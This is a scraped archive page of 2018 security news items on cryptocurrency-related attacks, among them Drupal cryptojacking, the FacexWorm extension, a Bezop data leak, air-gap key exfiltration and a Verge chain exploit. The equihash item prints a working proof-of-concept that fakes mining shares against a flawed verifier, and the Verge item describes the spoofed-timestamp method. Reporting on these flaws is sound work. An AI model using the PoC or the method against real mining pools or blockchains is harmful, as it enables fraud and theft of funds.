- Cryptocurrency -

Last update 09.10.2017 13:51:50

Introduction  List  Kategorie  Subcategory  0  1  2  3  4  5 



Hackers continue to hack Drupal installs to install backdoors and inject cryptocurrency malware
8.5.2018 securityaffairs Cryptocurrency

Recently security experts discovered two critical vulnerabilities in the Drupal CMS (CVE-2018-7600 and CVE-2018-7602), and cybercriminals promptly attempted to exploit them in the wild.
The hackers started using the exploits for the above vulnerabilities to compromise drupal installs, mostly cryptocurrency mining.

It has been estimated that potentially over one million Drupal websites are vulnerable to cyber attacks exploiting the two flaws if the security patches are not installed.

A week after the release of the security update for the CVE-2018-7600 flaw, a proof-of-concept (PoC) exploit was publicly disclosed.

The experts at security firm Check Point along with Drupal experts at Dofinity analyzed the CMS to analyzed the Drupalgeddon2 vulnerability and published a technical report on the flaw.

After the publication of the report. the expert Vitalii Rudnykh shared a working Proof-Of-Concept for Drupalgeddon2 on GitHub for “educational or information purposes.”

Immediately after the disclosure of the PoC, security experts started observing bad actors attempting to exploit the flaw to install crypto miners and backdoors.

Now, a growing number of malware campaigns is targeting Drupal installs, one of them was recently discovered by the security researcher Troy Mursch.

“Yesterday, I was alerted to a cryptojacking campaign affecting the websites of the San Diego Zoo and the government of Chihuahua, Mexico.” wrote Mursch.

“While these two sites have no relation to each other, they shared a common denominator — they both are using an outdated and vulnerable version of the Drupal content management system.”

Bad Packets Report
@bad_packets
#Coinhive found on the website of the San Diego Zoo (@sandiegozoo) in the latest high-profile case of #cryptojacking.

12:16 AM - May 5, 2018
14
See Bad Packets Report's other Tweets
Twitter Ads info and privacy

Bad Packets Report
@bad_packets
5 May
The #cryptojacking campaign targeting the @sandiegozoo website is also affecting the website of the government of Chihuahua.
(@SFP_Chihuahua)http://chihuahua.gob.mx/ https://twitter.com/jcgarciagamero/status/992549470846976001 …

Bad Packets Report
@bad_packets
Similar story here -- #Coinhive injected via the same #JavaScript library (jquery.once.js?v=1.2) pointing to http://vuuwd[.]com/t.js

Also an outdated #Drupal installation. pic.twitter.com/fXv2sBsIVB

2:04 AM - May 5, 2018


See Bad Packets Report's other Tweets
Twitter Ads info and privacy
The researcher discovered that hundreds of websites were compromised with a Coinhive script via the same method. The malicious code was contained in the “/misc/jquery.once.js?v=1.2” JavaScript library and even if the payloads were different, all the infected websites pointed to the same domain using the same Coinhive site key.

Mursch published a list of compromised website that includes the National Labor Relations Board and the Turkish Revenue Administration.

Security researchers from Imperva also found a malware campaign targeting Drupal websites tracked as “Kitty” campaign.

“As expected, since then we’ve been picking up various attack variants piggybacking on the Drupalgeddon 2.0 exploit, including remote scanners and backdoor attempts.” reads the analysis published by Imperva.

” During the inspection of the attacks blocked by our systems, we came across the “Kitty” malware, an advanced Monero cryptocurrency miner, utilizing a “webminerpool”, an open source mining software for browsers”

The attackers used an in-browser cryptocurrency miner inside a file named “me0w.js,” the code was provided by legitimate Monero mining pool service webminerpool.com.

Cybercriminals also installed a PHP-based backdoor on compromised.

According to Imperva, the Monero address used in the Kitty campaign is the same used in other attacks on servers running vBulletin 4.2.x forums that occurred in April.

“The Monero address used in “Kitty” was also spotted at the start of April 2018, in attacks targeting web servers that run the vBulletin 4.2.X CMS. The attacker uploaded the malware to the infected vBulletin web servers, turning them into distribution centers and making it much harder to track the attacker.” continues the analysis.

“The first generation of the ‘Kitty malware’ we discovered was version 1.5, and the latest version is 1.6. This type of behavior can be an indication of an organized attacker, developing their malware like a software product, fixing bugs and releasing new features in cycles.”

No doubts, the attackers will continue to attempt the exploitation of both Drupal flaws in the next weeks, for this reason, it is essential to apply the necessary updates.


Banks Don't Want to be Weakest Link in Blockchain Revolution
5.5.2018 securityweek  Cryptocurrency

Blockchain, the cutting-edge technology behind virtual currencies like bitcoin, has the potential to play a disruptive role in the global finance sector, experts say, as banking behemoths seek to connect with its opportunities.

While banks could reduce their costs, the gains could eventually shift to consumers who could benefit from quicker and cheaper services.

"Any disruptive shock -- be it technology, economic or political -- tends to result in winners and losers, and blockchain is no different," Colin Ellis, managing director for credit strategy at Moody's, told AFP.

"It could reduce costs for banks but at the same time could foster more competition that would put downward pressure on fees."

A shared, encrypted "ledger" that cannot be manipulated, blockchains offer the promise of secure transactions that allow anyone to get an accurate accounting of money, property or other assets.

Much like it underpins trading in bitcoin and other cryptocurrencies, blockchain or so-called distributed ledger technology could also support trading of other assets, thus posing a risk to banks who earn hefty fees helping their clients trade currencies and other assets.

Key areas of financial services where blockchain could have an impact are the settlement and clearing of transactions.

But a recent report by Moody's found that while blockchain technology could slash cross-border transaction costs for financial institutions, it would likely ramp up competition among banks.

Anish Mohammed, a cryptography expert and academic at Berlin University, told AFP that the losers would be those who failed to adapt to the latest technological trend.

"There will be winners and losers, the losers will be those who do not make any changes."

The world's biggest financial institutions are already experimenting with blockchain, although recent data indicates that they risk lagging behind other sectors in its use.

'Cheaper and quicker'

Two months ago, Dutch bank ING and its Swiss peer Credit Suisse successfully traded securities through a blockchain-style network.

The pair transmitted 25 million euros of bonds almost instantaneously. The deal would normally have taken one day or more.

Ellis believes that international transactions are an area where banks could cut their costs by using blockchain technology. Currently international bank transfers often take several days as several banks are often needed to act as intermediaries.

But a blockchain could eliminate the need for those intermediaries, thus speeding service and reducing costs.

Santander last month began using a blockchain to allow its retail customers in Spain, Britain, Brazil and Poland to complete international transfers the same or following day.

"One Pay FX uses blockchain-based technology to provide a fast, simple and secure way to transfer money internationally -- offering value, transparency, and the trust and service customers expect from a bank like Santander," the bank's chief executive Ana Botin said at the launch of the service.

One Pay FX uses a blockchain service for banks developed by Ripple, a start up firm with offers a cryptocurrency with the same name.

Around $2.1 billion (1.8 billion euros) will be invested via blockchain globally in 2018, according to US-based consultancy IDC.

One third of that will represent the financial services industry, IDC said.

Other notable sectors using blockchain include distribution and services, retail and professional services, and manufacturing and resources.

"The technology is still at a relatively early stage" so "it is too soon to know what the final impact will be," said Ellis. "But it could ultimately make banking cheaper and quicker for consumers," he concluded.


FacexWorm targets cryptocurrency users and spreads through Facebook Messenger
1.5.2018 securityaffairs Cryptocurrency

Social networks could be a privileged attack vector to rapidly spread a malware to a huge audience, FacexWorm targets cryptocurrency users by spreading through Facebook Messenger.
Social networks could be a privileged attack vector to rapidly spread a malware to a huge audience.

In the last hours, a new threat is spreading through leveraging an apparently harmful link for a video sent by a friend on Facebook messenger.

Security researchers from Trend Micro have spotted a malicious Chrome extension, dubbed FacexWorm, which is spreading through Facebook Messenger and targeting users of cryptocurrency trading platforms to steal their accounts’ credentials and run cryptocurrency mining scripts.

“Our Cyber Safety Solutions team identified a malicious Chrome extension we named FacexWorm, which uses a miscellany of techniques to target cryptocurrency trading platforms accessed on an affected browser and propagates via Facebook Messenger.” reads the report published by Trend Micro.

According to the experts, FacexWorm was first detected in late April and appears to be linked to two other Facebook Messenger spam campaigns, one that occurred in August 2017 and a second one that was launched in December 2017 to spread the Digmine cryptocurrency miner.

Experts recently observed a spike in FacexWorm activity, the malicious code was detected in several countries, including Germany, Tunisia, Japan, Taiwan, South Korea, and Spain.

FacexWorm implements several features, including stealing account credentials from websites, like Google and cryptocurrency sites, redirecting victims to rogue cryptocurrency sites, injecting cryptocurrency miners, and redirecting victims to the attacker’s referral link for cryptocurrency-related referral programs.

The following image shows the FacexWorm’s infection chain:

facexworm

FacexWorm propagates by links over Facebook Messenger to the friends of an affected Facebook account to redirect users to fake versions of popular video streaming websites, including YouTube. The user is encouraged to download a malicious Chrome extension as a codec extension to continue playing the video and to grant all extended permissions to complete the installation, with this trick malware can have full control for any websites the user visits.

Currently the malicious extension only Chrome users, when the malware detects a different browser it redirects the user to an innocuous-looking advertisement.

“FacexWorm is delivered through socially engineered links sent to Facebook Messenger. The links redirect to a fake YouTube page that will ask unwitting users to agree and install a codec extension (FacexWorm) in order to play the video on the page. It will then request privilege to access and change data on the opened website.” continues the report.

FacexWorm

Once FacexWorm Chrome extension is installed on the victim’s PC, it downloads more modules from its command and control server to perform other malicious activities.

“FacexWorm is a clone of a normal Chrome extension but injected with short code containing its main routine. It downloads additional JavaScript code from the C&C server when the browser is opened,” continues the report.

“Every time a victim opens a new webpage, FacexWorm will query its C&C server to find and retrieve another JavaScript code (hosted on a Github repository) and execute its behaviors on that webpage.”

Trend Micro detailed the malicious behaviors of the malware that include:

Steal the user’s account credentials for Google, MyMonero, and Coinhive.
Push a cryptocurrency scam.
Conduct malicious web cryptocurrency mining.
Hijack cryptocurrency-related transactions.
Earn from cryptocurrency-related referral programs.


New Bezop Cryptocurrency (BEZ) leaks Personal details for 25k users
30.4.2018 securityaffairs Cryptocurrency

Security experts at Kromtech discovered a MongoDB exposed personal details of 25,000 users tied to the Bezop cryptocurrency.
Security researchers at cybersecurity firm Kromtech have discovered a MongoDB database containing the personal details of over 25,000 Bezop (BEZ) cryptocurrency users.

Bob Diachenko
@MayhemDayOne
There are 1384 cryptocurrencies as of Jan 2018. One of them had a database of 25K active users with passwords and login details to the accounts/wallets, and also links to scanned documents like passports, driving licenses etc.

8:12 PM - Apr 10, 2018
2
See Bob Diachenko's other Tweets
Twitter Ads info and privacy
John Mcafee, who is Bezop advisor, described Bezop as “a distributed version of Amazon.com,” but it also implements cryptocurrency based on Ethereum,

John McAfee

@officialmcafee
ICO of the week: BEZOP.IO. Bezop is a distributed version of http://Amazon.com . it allows simple and secure creation of e-commerce sites - searchable in the same manner as Amazon - but with no Amazon as middle man. This could be as huge as it gets in the blockchain world.

3:57 AM - Jan 2, 2018
2,824
1,775 people are talking about this
Twitter Ads info and privacy
The database contained personal details information such as full names, home addresses, email addresses, encrypted passwords, wallet information, and scanned passports, driver’s licenses, or IDs.

Further analysis revealed that the database contained information relative a “bounty programme” launched by the Bezop development team launched early 2018.

One of the tables in the MongoDB database left exposed online was named “Bounty”, so the archive contained the information for the people who invested and participated in this part of the program.

Bezop team gave Tokens in exchange for promoting Bezop via online social media sites and forums or by writing blog posts about the cryptocurrency.

“On Mar 30, researchers at Kromtech Security identified a database open to the public containing full names, addresses, email addresses, encrypted passwords, wallet information, along with links to scanned passports, driver’s licenses, and other IDs for over 25,000 investors of the newly created Bezop.” reads the blog post published by Kromtech.

“Around the time of their ICO, which finished January 10, 2018. Bezop launched their first bounty program, in which people would earn Bezop Tokens in exchange for promoting Bezop via online social media sites like Facebook, posting to forums while using an approved Bezop signature on sites such as bitcointalk, moderation of forums, or by writing articles about Bezop.”

Bezop team confirmed the data leak and explained that the data were exposed while the dev team faced a DDoS attack on January 8.

“Bezop sent out a notice back on Jan. 8 during the ICO (initial coin offering), reporting both a DDoS attack and security holes exposing that data,” Deryck Jones, who is listed as Bezop.io’s CTO online, told Threatpost. “The Bezop notice went to all investors including me. It was an unfortunate incident and very disappointing.”

According to a Bezop spokesperson, the database contained details on around 6,500 ICO investors, while the remaining records were related to users who participated in the public bounty program.

The MongoDB was left exposed online without authentication until March 30, when Kromtech found it.

Bezop Cryptocurrency data leak

The MongoDB was promptly taken offline after Kromtech reported the discovery to the Bezop team.


Hackers Can Steal Cryptocurrency From Air-Gapped Wallets: Researcher
24.4.18 securityweek Cryptocurrency

Air-gapped cryptocurrency wallets are believed to hold private keys stored in them secure, but an Israeli researcher has demonstrated that attackers can leak the keys from such wallets in a matter of seconds.

In a recently published whitepaper (PDF), Dr. Mordechai Guri from the Ben-Gurion University of the Negev, Israel, explains that managing cryptocurrency wallets offline, in isolated computers, isn’t enough to secure the private keys from theft.

The air-gapped (cold) wallets are software wallets that are managed offline, disconnected from the Web, thus offering increased security compared to hot wallets, which are always online. Because they are physically isolated from the Internet, air-gapped wallets are said to provide the highest level of protection for private keys.

What the research paper reveals, however, is that an attacker able to infiltrate the offline wallet and to infect it with malicious code can then use various air-gap covert channel techniques to exfiltrate the private keys held in the wallet.

To compromise the isolated machine, the attacker can use various techniques that have already proven feasible in the past decade, the researcher argues. The malware can be preinstalled, delivered during the initial installation of the wallet, or pushed through removable media.

Exfiltration methods vary as well, and the whitepaper evaluates several techniques, including physical, electromagnetic, electric, magnetic, acoustic, optical, and thermal ones. Once in the possession of the private keys, the attacker has full control over the cryptocurrency in the compromised wallet.

“This research shows that although cold wallets provide a high degree of isolation, it’s not beyond the capability of motivated attackers to compromise such wallets and steal private keys from them. We demonstrate how a 256-bit private key (e.g., bitcoin’s private keys) can be exfiltrated from an offline, air-gapped wallet […] within a matter of seconds,” Guri notes.

Although kept on offline computers, external media – such as a USB flash drive, an optical disc (CD/DVD), or a memory card (SD card) – is occasionally connected to the air-gapped machine, usually for signing and broadcasting transactions. The use of removable media to infect computers is an attack vector known to be effective and attackers could use it to infiltrate the air-gapped wallet, Guri argues.

Attackers could also modify operating systems and wallets on the download sites to set up attacks. In 2016, the Linux Mint distribution was infected in such an incident, and so was a CCleaner version last year, which proves that such attack vectors are feasible as well. The wallet could also be infected after being downloaded, via the removable drive used to transfer it to the isolated computer.

Once the attacker has established a foothold in the air-gapped computer running the wallet, they can use covert channels to exfiltrate the private keys, the researcher says. These channels are classified into seven main categories: physical, electromagnetic, electric, magnetic, acoustic, optical, and thermal. Exfiltration rates can range from less than one second to several minutes.

Beatcoin attack exfiltration rates

“In this type of attack vector the wallet keys are transmitted from the offline wallet to a nearby (online) computer, smartphone, webcam, or other type of receiver via these covert channels. The private keys are then sent to the attacker through the Internet,” the whitepaper reads.

Attackers can use physical (removable) media to steal the private keys and send them to the attacker when the drive is inserted into the hot wallet computer.

The AirHopper proof-of-concept (PoC) malware demonstrated several years ago how data can be exfiltrated using electromagnetic signals. Similarly, the GSMem PoC malware showed how data can be sent from the infected machine to nearby mobile phones over GSM frequencies. USBee also uses electromagnetic emissions for data exfiltration from isolated computers.

The recently demonstrated PowerHammer malware can stealthily exfiltrate data from air-gapped computers using power lines. Similarly, the ODINI and MAGNETO malware families use magnetic fields for data exfiltration.

Optical signals can also be leveraged for data exfiltration, either using keyboard LEDs, hard disk drive (HDD) LEDs, or QR stenography. This last method is feasible when a QR code displayed on the isolated computer’s screen is used to validate a transaction. Attackers could covertly project the private keys on the screen along with the QR code of the signed transaction.

The recently detailed MOSQUITO attacks demonstrate how acoustic covert channels can be used for data exfiltration. Computer fans can also be leveraged for similar purposes, the same as the acoustic signals emitted from the HDD.

Several years ago, security researchers also demonstrated that heat emissions and built-in thermal sensors of two computers in close proximity can be used for data transmission.

Countermeasures include the use of anti-virus programs and intrusion detection and prevention systems to keep malware off the air-gapped computer in the first place. Furthermore, it is possible to detect and block some of the covert channels through behavioural analysis, the researcher argues.

“With the emergence of cryptocurrencies and the accompanying need to secure private keys from online threats, it has been suggested that private users manage their cryptocurrency wallets offline in isolated, air-gapped computers. We show that despite the high degree of isolation of cold wallets, motivated attackers can steal the private keys out of the air-gapped wallets. With the private keys in hand, an attacker virtually owns all of the currency in the wallet,” Guri concludes.


Attackers Fake Computational Power to Steal Cryptocurrencies from equihash Mining Pools
22.4.2018 securityaffairs Cryptocurrency

Security experts at 360 Core Security have recently detected a new type of attack which targets some equihash mining pools.
After analysis, they found out the attacked equihash mining pools are using a vulnerable equihash verifier

(equihashverify : https://github.com/joshuayabut/equihashverify) to verify miners’ shares.

There is a logic vulnerability in this verifier, so attacker can easily fake mining shares which can bypass the equihash solution verifier without using so much computing power.

This vulnerability has a wide impact because the verifier (equihashverify) is previously used by the Zcash official open source mining pool (node-stratum-pool), and many new cryptocurrencies which use equihash as PoW algorithm are forked from this pool.

Equihash is a memory-oriented Proof-of-Work algorithm developed by the University of Luxembourg’s Interdisciplinary Centre for Security, Reliability and Trust (SnT).

The cryptocurrency ZCash integrated Equihash in April 2016, for reasons such as security, privacy, and ASIC miner resistance.

According to the CryptoLUX scientists, the algorithm permits avoiding centralization of the mining process in the hands of a few first-class miners with specialized mining hardware, thus contributing to the “democratization” of digital currencies based on Equihash.

equihash mining pools

Running Equihash will use quite a lot of memory which means how much you can mine depends on the volume of your computing memory. This makes it impossible to customize a low-cost mining hardware in a short time.

The vulnerability in this report is not a vulnerability of Equihash, but a vulneranility of the implementation of Equihash solution verifier. Here is the detail:

In file equi.c, we can find the function bool verifyEH(const char *hdr, const char *soln). The parameter hdr stands for the blockheader and the parameter soln={x1,x2,…,x512} stands for the user summited solution for Equihash.

The algorithm computes:

Vhash=hash(hdr,x1)^ hash(hdr,x2) ^…^. hash(hdr,x512);


The next step is to check if all the returned values in Vhash are zeros. If they all equal to zero, return true.

If not, return false. It seems to be feasible; however, things are different in reality because there are multiple vulnerabilities in the algorithm.

The simplest one is that the function does not check whether xi is duplicated. So, if the attacker provides a solution with {x1=1,x2=1,x3=1,…,x512=1}, then he can bypass the equihash verifier for any blockheader.

Node-stratum-pool has changed the dependency of Equihashverify to a zencash official equihashverify (https://github.com/zencashofficial/equihashverify.git). However, many other smaller cryptocurrencies and mining pools haven’t updated their dependencies yet. Attacks are happening in the wild, so please update yours in time.

The simple POCs are following:

var ev = require(‘bindings’)(‘equihashverify.node’);

header = Buffer(‘0400000008e9694cc2120ec1b5733cc12687b609058eec4f7046a521ad1d1e3049b400003e7420ed6f40659de0305ef9b7ec037f4380ed9848bc1c015691c90aa16ff393000000000000

0000000000000000000000000000000000000000000000000000c9310d5874e0001f000000000000000000000000000000010b000000000000000000000000000040’, ‘hex’);

soln = Buffer(‘0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f000

0f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007

c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e

0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f000

0f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001

f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80

007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c000

3e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001

f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80

007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c000

3e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001

f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80

007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003

e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e00

01f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f000

0f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c

0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e

0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f000

0f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007

c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f’, ‘hex’); console.log(ev.verify(header, soln));


Bitcoin web wallet addresses generated with a flawed library are exposed to brute-force attacks
16.4.2018 securityaffairs Cryptocurrency

Multiple vulnerabilities in the SecureRandom() function expose Bitcoin web wallet addresses generated by the flawed library to brute-force attacks.
Old Bitcoin web wallet addresses generated in the browser or through JavaScript-based wallet apps might be affected by a cryptographic vulnerability that could be exploited b attackers to steal funds.

According to the experts, the popular JavaScript SecureRandom() library isn’t securely random, this means that an attacker can launch brute-force attacks on private keys.

The flaw affects the JavaScript SecureRandom() function that is used for generating a random Bitcoin address and its adjacent private key, currently, it doesn’t actually.

“It will generate cryptographic keys that, despite their length, have less than 48 bits of entropy, […] so its output will have no more than 48 bits of entropy even if its seed has more than that,” said the system administrator David Gerard.

“SecureRandom() then runs the number it gets through the obsolete RC4 algorithm, which is known to be more predictable than it should be, i.e. less bits of entropy,” Gerard added. “Thus, your key is more predictable.”

Gerard concluded that all Bitcoin addresses generated using the SecureRandom() function are vulnerable to brute-force attacks.

“The conclusion seems to be that at least all wallets generated by js tools inside browsers since bitcoin exists until 2011 are impacted by the Math.random weakness if applicable to the related implementations, the Math.random or RC4 (Chrome) weakness between 2011 and 2013, and RC4 weakness for Chrome users until end of 2015” continues Gerard.

Gerard explained that several web-based or client-side wallet apps used the SecureRandom() function, the expert said that all Bitcoin addresses possibly affected are:

BitAddress pre-2013;
bitcoinjs before 2014;
current software that uses old repos they found on Github.
A user has thrown the same alert on the Linux Foundation mailing list:

“A significant number of past and current cryptocurrency products contain a JavaScript class named SecureRandom(), containing both entropy collection and a PRNG. The entropy collection and the RNG itself are both deficient to the degree that key material can be recovered by a third party with medium complexity.” reads the alert.

The researcher Mustafa Al-Bassam added that several old implementations for web and client-side Bitcoin wallets apps leveraged the jsbn.js cryptographic library for generating Bitcoin addresses. Unfortunately, the jsbn.js cryptographic library used the SecureRandom() function, this means that Bitcoin address private keys were exposed to attack.

“The original disclosure didn’t contain any information about the library in question, so I did some digging.” added Mustafa.

“I think that the vulnerability disclosure is referring to a pre-2013 version of jsbn, a JavaScript crypto library. Before it used the CSRNG in the Web Crypto API, it tried to use nsIDOMCrypto, but incorrectly did a string comparison when checking the browser version.”

If you are using a Bitcoin wallet address generated with tools using the flawed functions you need to generate new Bitcoin address and transfer the funds to the new one.


$3.3 Million stolen from main Coinsecure Bitcoin wallet
13.4.2018 securityaffairs Cryptocurrency

Cryptocurrency exchange Coinsecure, India’s second exchange, announced that it has suffered a severe issue, 438 bitcoin, $3,3 million worth of bitcoin
Cryptocurrency exchange Coinsecure, India’s second exchange, announced that it has suffered a severe issue, 438 bitcoin, $3,3 million worth of bitcoin, have been transferred from the main wallet to an account that is not under their control.

CEO Mohit Kalra said that only he the Chief Strategist officer (CSO) Dr. Amitabh Saxena had private keys to the exchange’s main wallet.

“The current issue points towards losses caused during an exercise to extract BTG to distribute to our customers. Our Chief Strategist officer (CSO) Dr. Amitabh Saxena was extracting BTG and he claims that the funds have been lost in the process during the extraction of the private keys.” reads the statement published by Coinsecure.

According to the CEO of Coinsecure, the CSO is responsible for the transfer, the company posted two imaged on the websites containing company statement signed by the Coinsecure team and a scanned copy of a police complaint filed by Coinsecure CEO Mohit Kalra.

coinsecure hack

The Coinsecure CEO excluded the transfer was the result of a hack and accused the CSO, but Dr. Saxena denied any involvement in the case and informed Coinsecure that the funds “were stolen from company’s Bitcoin wallet due to some attack.”.

“Our system itself has never been compromised or hacked, and the current issue points towards losses caused during an exercise to extract BTG [Bitcoin Gold] to distribute to our customers, ” the Coinsecure team wrote in its statement

“Our CSO, Dr. Amitabh Saxena, was extracting BTG and he claims that funds have been lost in the process during the extraction of the private keys,” Coinsecure added.

“[he] making a false story to divert [his] attention and might have a role to play in this entire incident.”

The CEO is asking local police to seize the Saxena’s passport because he fears that the employee “might fly out of the country soon.”


Verge Cryptocurrency suffered a cyber attack, dev team responded with an Hard Fork
9.4.2018 securityaffairs Cryptocurrency

The verge (XVG) currency schema was attacked last week, the hacker reportedly making off with $1 million-worth of tokens. The dev team responded with an Hard Fork.
Ripple (XRP) and Verge (XVG) are two cryptocurrencies that attracted many investors in the last months.

Last week attackers hackers the Verge cryptocurrency system by exploiting a vulnerability in its software and forced its developers to hard-fork the currency.

The bug in the cryptocurrency scheme allowed the attacker to mine blocks with bogus timestamps, it seems that attackers were able to generate new blocks at a rate of roughly one per second.

The hacker reportedly making off with $1 million-worth of tokens, the news was later confirmed on Bitcoin Talk forum by the user with the handle “ocminer” of the Suprnova Mining Pools.

“There’s currently a >51% attack going on on XVG which exploits a bug in retargeting in the XVG code. Usually to successfully mine XVG blocks, every “next” block must be of a different algo.. so for example scrypt, then x17, then lyra etc.” wrote ocminer.

“Due to several bugs in the XVG code, you can exploit this feature by mining blocks with a spoofed timestamp. When you submit a mined block (as a malicious miner or pool) you simply set a false timestamp to this block one hour ago and XVG will then “think” the last block mined on that algo was one hour ago. Your next block, the subsequent block will then have the correct time..

And since it’s already an hour ago (at least that is what the network thinks) it will allow this block to be added to the main chain as well.”

OCminer speculated it was a 51 per attack(aka majority attack), this means that hackers in somehow were able to control the majority of the network mining power (hashrate).

The Verge development team finally confirmed on Wednesday the attack that caused the XVG value to drop from $0.07 to $0.05.

vergecurrency
@vergecurrency
We had a small hash attack that lasted about 3 hours earlier this morning, it's been cleared up now. We will be implementing even more redundancy checks for things of this nature in the future! $XVG #vergefam

7:06 PM - Apr 4, 2018
1,366
691 people are talking about this
Twitter Ads info and privacy
In response to the incident, the Verge team hard forked XVG that resulted in the creation of a new blockchain.
“The XVG team erroneously forked their entire network to ‘undo’ the exploited blocks, but this resulted in the entire network being unable to sync,” noted cryptocurrency news site The Merkle.

“When the team was made aware of their mistake, they were able to re-sync the network, but still have not completely defeated the issue.”

At the time of writing the Verge currency has recovered all its value.

verge hacked


Google Bans Cryptocurrency Mining Extensions From Chrome Web Store
8.4.2018 thehackernews Cryptocurrency

In an effort to prevent cryptojacking by extensions that maliciously mine digital currencies without users' awareness, Google has implemented a new Web Store policy that bans any Chrome extension submitted to the Web Store that mines cryptocurrency.
Over the past few months, we have seen a sudden rise in malicious extensions that appear to offer useful functionality, while embedding hidden cryptocurrency mining scripts that run in the background without the user's knowledge.
Last month, cryptocurrency miners were even found in a Russian nuclear weapons lab and on thousands of government websites. In January, cryptocurrency mining malware also infected more than half-million PCs.


Until now, only those cryptocurrency mining extensions were allowed on the Chrome Web Store that are solely intended for mining, and explicitly informed users about its working and revenue model.
If the company finds any mining extension developers submitted was not in compliance and secretly mines cryptocurrency using a victim device's computing power, it simply blocks the extension.

Since about 90 percent of the mining extensions developers submitted to the Chrome Web Store failed to comply with the rules, the tech giant decided to ban all browser extensions that mine cryptocurrency (even if it's used for legitimate purposes) from its Web Store.
"Starting today, Chrome Web Store will no longer accept extensions that mine cryptocurrency," Google says in its Chromium Blog. "Existing extensions that mine cryptocurrency will be delisted from the Chrome Web Store in late June."
However, the ban on cryptocurrency mining extensions will not impact other digital currency and blockchain-related extensions, such as Bitcoin price checkers, blockchain browsers, and cryptocurrency wallet managers.


Google noted that its new move is "another step forward in ensuring that Chrome users can enjoy the benefits of extensions without exposing themselves to hidden risks."
Though banning cryptocurrency mining extensions is definitely a great move, the ban may not eliminate the problem as a whole, since attackers have increasingly been developing ways to hide their mining functionality in an extension until after it gets Chrome Web Store approval.
The ban comes less than a month after Google announced its plans to ban advertisements related to cryptocurrency.
Google is not the first one to impose a ban on cryptocurrency-related abuses. Late last month, Twitter announced its plan to block cryptocurrency-related ads on its platform, and in January, Facebook banned all ads promoting cryptocurrencies, including Bitcoin and ICOs.


Pocket cryptofarms

7.4.2018 Kaspersky Android  Cryptocurrency
Investigating mobile apps for hidden mining
In recent months, the topic of cryptocurrency has been a permanent news fixture — the value of digital money has been see-sawing spectacularly. Such pyrotechnics could hardly have escaped the attention of scammers, which is why cryptocurrency fluctuations have gone hand in hand with all kinds of stories. These include hacked exchanges, Bitcoin and Monero ransoms, and, of course, hidden mining. We’ve noticed that attackers no longer limit themselves to servers, desktops, and laptops. They are increasingly drawn to mobile devices, mainly Android. We decided to take a closer look to see which mobile apps stealthily mine digital coins on user devices and how widespread they are.

Primitive counterfeit apps
We found several types of malware posing as popular programs and games, but actually just showing ads and secretly mining cryptocurrencies using the CoinHive SDK. In particular, we unearthed counterfeit versions of Instagram, Netflix, Bitmoji, and others. The scammers had added the word “hack” to the original app names. These “hacked” apps were distributed through forums and third-party stores. Kaspersky Lab products detect such programs as RiskTool.AndroidOS.Miner.

Fragment of RiskTool.AndroidOS.Miner.a code that runs a hidden miner and displays an advertising page

Advertising page that RiskTool.AndroidOS.Miner.a shows to the user

Primitive miners based on web frameworks
There are a number of web frameworks that make it easy to create mobile apps, including miners. At the heart of such apps there lies a web page containing a JS script for mining cryptocurrency (for example, the CoinHive script). Most of the miners we found of this type were based on the Thunkable and Cordova frameworks. These apps are most commonly distributed through third-party sites, although one of them was found in the official Google Play store, where it was removed after we reported it.

Screenshot of a game in the Google Play store that mined cryptocurrency

We also found one app built on a different framework, Andromo. It looks like a discount aggregator at first glance, but instead of linking to sites with discounted products, it loads a page that mines cryptocurrency and doesn’t even try to hide it:

